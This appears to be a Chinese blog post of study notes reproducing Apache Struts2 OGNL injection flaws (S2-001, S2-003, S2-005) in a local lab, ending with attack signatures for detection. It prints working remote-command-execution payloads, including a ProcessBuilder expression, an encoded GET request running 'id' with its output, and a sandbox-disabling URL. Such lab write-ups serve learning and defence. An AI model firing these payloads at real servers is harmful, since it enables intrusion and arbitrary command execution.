struts2框架漏洞

已于 2024-06-16 23:43:39 修改
阅读量564 收藏 12
点赞数 14
分类专栏: 学习笔记 文章标签: struts 漏洞复现
于 2024-06-16 23:43:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82000839/article/details/139728780
版权

title: struts2框架漏洞
categories:

  • 漏洞复现
    abbrlink: 48203
    date: 2024-06-14 15:45:27

前言知识

ognl表达式注入

对象导航图语言,用于访问对象的字段、方法。基于简化访问java对象属性和调用方法需求,实现字段类型转化等功能;访问列表的元素:peoplelist[0]

//正常java代码
String name = MyUser.getName()
//表达式写法
#MyUser.name
对静态方法或变量的访问
  • java:类名.方法名
  • ognl:@类名@方法名
思考:

后端写了一段程序:使用了ognl这个功能,getValue值可控,用户传入恶意表达式,导致漏洞

%{value}将表达式值转换为字符串格式,在数据库查询参数的动态构造中非常有用

Runtime

作用域

在java中,方法的作用域指的是方法可以被访问的范围

  1. Public:公共方法,可以被任何类访问
  2. Protected:受保护方法,可以被同一包内的类和该类的子类访问
  3. Default(package-private):默认方法,只能被同一包内的类访问
  4. Private:私有方法,只能在定义该方法的类内部访问
使用Runtime时

为啥不用通过 new 这种形式来创建对象

Runtime的类构造方法定义域时private–>导致无法new一个新的对象出来

image-20240616221741744

那怎样获取Runtime的对象?
image-20240616221526053

静态方法

在java中,static关键字用于表示一个成员属于类本身,而不是某个对象

  • 无需创建类的实例即可被调用,可使用类名+方法名调用,例如ClassName.methodName()
  • 非静态成员依赖于对象实例;静态方法不依赖任何实例
如何去执行
private static Runtime currentRuntime = new Runtime();
public static Runtime getRuntime() {
    return currentRuntime;
}
定义currentRuntime的私有静态变量,初始化为一个新的Runtime对象。然后,它提供了一个公共静态方法getRuntime(),该方法返回currentRuntime变量的值。

image-20240616223228152

new Runtime(); 不能用

Runtime.getRuntime(); 获取到Runtime对象

漏洞原理

用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用ognl表达式%{value}进行解析,然后重新填充到对应的表单数据中。

例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行

漏洞复现

S2-001

poc:

//获取tomcat执行路径
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

/usr/local/tomcat

image-20240616224658534

//获取web路径
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

/usr/local/tomcat/webapps/ROOT/

image-20240616224911469

//执行任意命令
new java.lang.String[]{"cat","/etc/passwd"}

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

image-20240616225506526

S2-003

ognl表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,通过unicode编码(u2003)或8进制即可绕过安全限制,从而操纵服务器端上下文对象

公布的poc

GET /s2_war/index.action?(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&(%27\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\u0023mycmd\u003d\%27id\%27%27)(bla)(bla)&(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)%27)(bla)(bla)&(A)((%27\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())%27)(bla))&(B)((%27\u0023myres\u003dnew\40byte[51020]%27)(bla))&(C)((%27\u0023mydat.readFully(\u0023myres)%27)(bla))&(D)((%27\u0023mystr\u003dnew\40java.lang.String(\u0023myres)%27)(bla))&(%27\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\u0023myout.getWriter().println(\u0023mystr)%27)(bla)) HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,pt;q=0.7,da;q=0.6
Cookie: JSESSIONID=FC7DC2221FDB37EAE855C6E6A11E9CC1; _ga=GA1.1.267931382.1545202285
Connection: close

请求响应内容:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Mon, 24 Dec 2018 09:36:01 GMT
Connection: close

uid=1234556(xxxx) gid=1603212982 groups=1603212982....

S3-005

XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:

user.address.city=Bishkek&user['favoriteDrink']=kumys 
//会被转化成
action.getUser().getAddress().setCity("Bishkek")  
action.getUser().setFavoriteDrink("kumys")

触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:

  • S2-003 使用\u0023绕过s2对#的防御

  • S2-003后官方增加了安全模式(沙盒)

  • S2-005使用ognl表达式将沙盒关闭,继续使用代码

poc(无回显,空格用@代替):

/example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

image-20240616231748445

进入容器可以看到/tmp下创建了success文件

image-20240616231717266

struts2攻击特征有哪些

RCE试图传⼊的命令以及执⾏结果

参数伪造,试图传⼊OGNL表达式

struts2的特征

.do .action后缀常会出现,.jsp也可能

能够处理OGNL表达式

lu-fe1
关注
  • 14
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Struts2漏洞
2403_82795493的博客
02-20 1697
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架Struts 2是Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
Struts2漏洞利用工具
03-20
Struts2是一个基于MVC设计模式的Web应用框架,但2存在远程代码执行的漏洞,现在Struts2漏洞检测工具2017版增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过...
Struts2框架漏洞
qian_227的博客
07-16 203
{iii}S2-045/S2-046漏洞Struts2使用基于Jakarta的文件上传Multipart解析器,如果该Content-Type值无效,则会引发异常,然后将其用于向用户显示错误消息,并对异常信息进行OGNL表达式处理,可以构造恶意Content-Type值执行RCE攻击。S2-046与S2-045漏洞的引发原因一致,只是他们的利用位置不一样。{ii}S2-005漏洞:S2-005是由于官方在修补S2-003 不全面导致绕过补丁造成的。
struts2框架漏洞复现
Bird&Bird
01-07 4351
目录1、S2-001远程代码执行漏洞(CVE-2007-4556)漏洞简介影响范围漏洞复现S2-005 远程代码执行漏洞(CVE-2010-1870)漏洞简介影响版本绕过过程漏洞复现 1、S2-001远程代码执行漏洞(CVE-2007-4556) 漏洞简介 当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。 影响范围 Struts 2.0.0 - 2.0.8 漏洞复现 输入%{1+1},返回2就是存在该漏洞。 获取
Struts2框架漏洞总结与复现(下)
剁椒鱼头没剁椒的博客
02-08 1721
Apache Struts 1插件的Apache Struts 2.3.x 版本中存在远程代码执行漏洞,该漏洞出现于Struts2的某个类中,该类是为了将Struts1中的Action包装成为Struts2中的Action,以保证Struts2中的Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类中,从而导致任意命令执行,进而获取目标主机系统权限。在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。
Struts2框架漏洞总结与复现(上) 含Struts2检测工具
剁椒鱼头没剁椒的博客
02-06 5993
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用paramname作为重定向变量,UserAction中定义有一个name变量,当触发redirect类型返回时,Struts2获取使用{name}获取其值,在这个过程中会对name参数的值执行OGNL表达式解析,从而可以插入任何OGNL表达式导致命令执行。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。
struts2漏洞
qq_52527336的博客
06-30 9713
记一下笔记一个个写吧
Struts框架漏洞
小小猪的博客
08-18 1272
Struts框架漏洞 Struts-S2-013漏洞利用 不妨先来看下index.jsp中标签是怎么设置的 <p><s:a id="link1" action="link" includeParams="all">"s:a" tag</s:a></p> <p><s:url id="link2" action="link" includeParams="all">"s:url" tag</s:url></p&
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9423
前言: 本篇文章中复现漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 7493
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
struts1漏洞总结及整改方案
08-07
因为最近攻防演练,对公司的资产进行梳理,发现部分应用还使用的struts1框架,所以赶快收集整理了相关的漏洞以及相关的整改方案。提供给大家。
Struts2漏洞检查工具2018版.zip
04-04
Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。
Struts2漏洞检查工具.rar
10-23
Struts2 是一种轻量级的 MVC 框架,主要解决了请求分发的问题,重心在控制层和表现层。低侵入性,与业务代码的耦合度很低。Struts2 实现了 MVC,并提供了一系列 API,采用模式化方式简化业务开发过程。
Apache的Struts2框架严重安全漏洞
07-20
Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27...
PyCharm是由JetBrains公司开发的一款流行的Python集成开发环境(IDE)
06-23
PyCharm是由全球知名的软件开发工具提供商JetBrains开发的,专为Python开发者设计的集成开发环境(IDE)。它提供了一个全面而强大的工具集,以帮助开发者提高开发效率和代码质量。以下是关于PyCharm的一些详细介绍: ### PyCharm官网信息 - **官方网站**: [https://www.jetbrains.com/pycharm/](https://www.jetbrains.com/pycharm/) - **下载链接**: [https://www.jetbrains.com/pycharm/download/](https://www.jetbrains.com/pycharm/download/) ### PyCharm版本 - **PyCharm Community Edition**: 免费版,提供基本的Python开发功能,适合初学者和小型项目。 - **PyCharm Professional Edition**: 商业版,包含Community版所有功能,并增加了Web开发、数据库支持、Python Web框架等高级功能。 ###
基于MATLAB实现的LeNet-5网络,基于cifar-10数据库
06-23
【作品名称】:基于MATLAB实现的LeNet-5网络,基于cifar-10数据库 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:基于MATLAB实现的LeNet-5网络,基于cifar-10数据库
07-大气茶叶企业vi手册 28 PS设计素材资源茶叶奶茶品牌手册AI格式.zip
06-23
PS设计素材资源茶叶奶茶品牌手册AI格式,茶叶品牌,茶叶品牌。
海信电视刷机数据 LED46K16X3D(0001) 生产用软件数据 务必确认机编一致 整机USB升级程序
最新发布
06-23
务必确认机身编号与文件名机编一致,如不一致,请勿下载 机身编号一般在机子背面的贴纸上 MST6i48/78/98机芯 1、将Target文件夹拷至U盘。打开U盘上的Target文件夹,可看到一个version.txt文件,其内容类似如下:LED42K16P-B1203_V02.00 2、LED42K16P-B1203对应了机型:LED42K16P(1203) ,V02.00代表了升级软件的版本。注意:该版本号并不代表实际软件版本一定就是该数值,升级时必须保证version.txt中的机型参数与电视中的一致,或者是更高的版本。否则是不能升级的。 3、电视开机状态下插入电视机的USB接口,电视机内部软件会自动识别该升级文件,并给出升级提示。按“OK”键确认升级,电视开始黑屏并进入升级状态,U盘指示灯会不听闪烁,这个过程中不要拔下U盘。 4、升级完后电视会自动重新启动,若此时未拔下U盘,电视可能会再次给出升级提示,这时选“否”或按菜单键取消即可。 5、升级完后需要进入工厂菜单清空一下母块。
struts2l漏洞
07-27
Struts2是一个Java Web应用框架,曾经存在过一些安全漏洞。其中比较著名的是S2-045漏洞,它是一个远程代码执行漏洞,攻击者可以通过构造恶意的表达式注入攻击代码,并最终执行在服务器上。该漏洞影响了Struts2版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值